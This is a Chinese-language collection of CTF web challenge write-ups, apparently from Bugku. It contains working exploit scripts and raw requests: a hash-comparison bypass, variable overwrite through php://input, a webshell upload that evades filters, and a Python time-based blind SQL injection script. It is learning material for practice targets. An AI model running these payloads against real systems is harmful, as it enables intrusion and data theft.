你从哪里来
http://123.206.87.240:9009/from.php
加上Referer:https://www.google.com 必须要https,我之前尝试http怎么也出不来flag
flag{bug-ku_ai_admin}
md5 collision(NUPT_CTF)
http://123.206.87.240:9009/md5.php
莫名其妙的题,输一个md5值为0e的字符串,就得到flag了,http://123.206.87.240:9009/md5.php?a=s878926199a
flag{md5_collision_is_easy}
程序员本地网站
http://123.206.87.240:8002/localhost/
请从本地访问
设置headers X-Forwarded-For:127.0.0.1 就得到flag了
flag{loc-al-h-o-st1}
各种绕过
各种绕过哟
http://123.206.87.240:8002/web7/
代码审计题,代码如下:
<?php
highlight_file('flag.php');
$_GET['id'] = urldecode($_GET['id']);
$flag = 'flag{xxxxxxxxxxxxxxxxxx}';
if (isset($_GET['uname']) and isset($_POST['passwd'])) {
if ($_GET['uname'] == $_POST['passwd'])
print 'passwd can not be uname.';
else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin'))
die('Flag: '.$flag);
else
print 'sorry!';
}
?>考点在sha1($_GET['uname']) === sha1($_POST['passwd']) 传入的两个参数不能相等,但是sha1()后的值需要全等,利用sha1()处理数组返回flase的漏洞,进行绕过,解题脚本如下:
# -*- coding:utf-8 -*-
import requests
if __name__ == '__main__':
url = 'http://123.206.87.240:8002/web7/?uname[]=&id=margin'
response = requests.post(url, data={"passwd[]": "1"})
print(response.text)flag{HACK_45hhs_213sDD}
web8
txt????
http://123.206.87.240:8002/web8/
<?php
extract($_GET);
if (!empty($ac))
{
$f = trim(file_get_contents($fn));
if ($ac === $f)
{
echo "<p>This is flag:" ." $flag</p>";
}
else
{
echo "<p>sorry!</p>";
}
}
?>变量覆盖漏洞,解题脚本如下:
# -*- coding:utf-8 -*- import requests if __name__ == '__main__': url = 'http://123.206.87.240:8002/web8/?ac=1&fn=php://input' response = requests.post(url, data='1') print(response.text)
flag{3cfb7a90fc0de31}
细心
地址:http://123.206.87.240:8002/web13/
想办法变成admin
首页显示404,扫描一下目录,有robots.txt文件,访问resusl.php,提示要输入密码,随便输入测试一下,最后输入admin得到flag
flag(ctf_0098_lkji-s)
求getshell
求getshell
http://123.206.87.240:8002/web9/
文件上传绕过,使用burpsuite拦截请求,并修改header中的Content-Type,改一下大小写,然后修改文件后缀名为php2, php3, php4, php5, phps, pht, phtm, phtml,一个一个测试,最终php5成功。
POST /web9/index.php HTTP/1.1 Host: 123.206.87.240:8002 Content-Length: 426 Cache-Control: max-age=0 Origin: http://123.206.87.240:8002 Upgrade-Insecure-Requests: 1 Content-Type: Multipart/form-data; boundary=----WebKitFormBoundaryFIpHkQ8rB2zpCR8U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://123.206.87.240:8002/web9/ Accept-Language: zh-CN,zh;q=0.9,und;q=0.8 Connection: close ------WebKitFormBoundaryFIpHkQ8rB2zpCR8U Content-Disposition: form-data; name="file"; filename="QQ截图20190817094816.php5" Content-Type: image/png PNG webshell ------WebKitFormBoundaryFIpHkQ8rB2zpCR8U Content-Disposition: form-data; name="submit" Submit ------WebKitFormBoundaryFIpHkQ8rB2zpCR8U--
KEY{bb35dc123820e}
INSERT INTO注入
题目:
地址:http://123.206.87.240:8002/web15/
flag格式:flag{xxxxxxxxxxxx}
不如写个Python吧
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);解答:
题目提供了源码,看源码应该是通过sleep进行盲注,但是过滤了逗号(,),需要绕过逗号进行盲注,解题脚本如下:
# -*- coding:utf-8 -*-
import requests
if __name__ == '__main__':
# url = 'http://123.206.87.240:8002/web15/'
# allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
# database = ''
# flag = 1
# for i in range(1, 10):
# for j in allString:
# header = {
# "X-Forwarded-For": "1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#" % (
# i, ord(j))
# }
# r = requests.get(url, headers=header)
# t = r.elapsed.total_seconds()
# # print('the time of ' + j + ' is ' + str(t))
# if t >= 3:
# database = database + j
# print('the ' + str(i) + ' place of database is ' + j)
# break
# elif t < 3 and j == 'M':
# flag = 0
# break
# if flag == 0:
# break
# print('database:', database) #web15
# url = 'http://123.206.87.240:8002/web15/'
# allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
# table_name = ''
# flag = 1
# for i in range(1, 20):
# for j in allString:
# header = {
# "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))=%d) then sleep(3) else 0 end))#" % (
# i, ord(j))
# }
# r = requests.get(url, headers=header)
# t = r.elapsed.total_seconds()
# #print('the time of ' + j + ' is ' + str(t))
# if t >= 3 and t < 4:
# table_name = table_name + j
# print('the ' + str(i) + ' place of table_name is ' + j)
# break
# elif t < 3 and j == 'M':
# flag = 0
# break
# if flag == 0:
# break
# print('table_name:', table_name)#flag
# url = 'http://123.206.87.240:8002/web15/'
# allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
# column_name = ''
# flag = 1
# for i in range(1, 20):
# for j in allString:
# header = {
# "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#" % (
# i, ord(j))
# }
# r = requests.get(url, headers=header)
# t = r.elapsed.total_seconds()
# #print('the time of ' + j + ' is ' + str(t))
# if t >= 3 and t < 4:
# column_name = column_name + j
# print('the ' + str(i) + ' place of table_name is ' + j)
# break
# elif t < 3 and j == 'M':
# flag = 0
# break
# if flag == 0:
# break
# print('column_name:', column_name)
url = 'http://123.206.87.240:8002/web15/'
allString = '''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
flag = ''
f = 1
for i in range(1,30):
for j in allString:
header = {
"X-Forwarded-For":"1'+(select case when (ascii(substr((select flag from flag) from %d for 1))=%d) then sleep(3) else 0 end))#"%(i,ord(j))
}
r = requests.get(url,headers=header)
t = r.elapsed.total_seconds()
#print('the time of '+j+' is '+str(t))
if t >= 3 and t < 4:
flag = flag + j
print('the '+str(i)+' place of table_name is '+j)
break
elif t < 3 and j == 'M':
f = 0
break
if f == 0 :
break
print('flag:',flag)flag{cdbf14c9551d5be5612f7bb5d2867853}
这是一个神奇的登陆框
题目:
http://123.206.87.240:9001/sql/
flag格式flag{}
解题:
打开就是一个登录页面,用bp抓包,放到sqlmap中跑,直接能跑出注入点
POST /sql/ HTTP/1.1 Host: 123.206.87.240:9001 Content-Length: 52 Cache-Control: max-age=0 Origin: http://123.206.87.240:9001 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://123.206.87.240:9001/sql/ Accept-Language: zh-CN,zh;q=0.9,und;q=0.8 Cookie: isadmin=false Connection: close admin_name=admin&admin_passwd=123456&submit=GO+GO+GO
flag{ed6b28e684817d9efcaf802979e57aea}
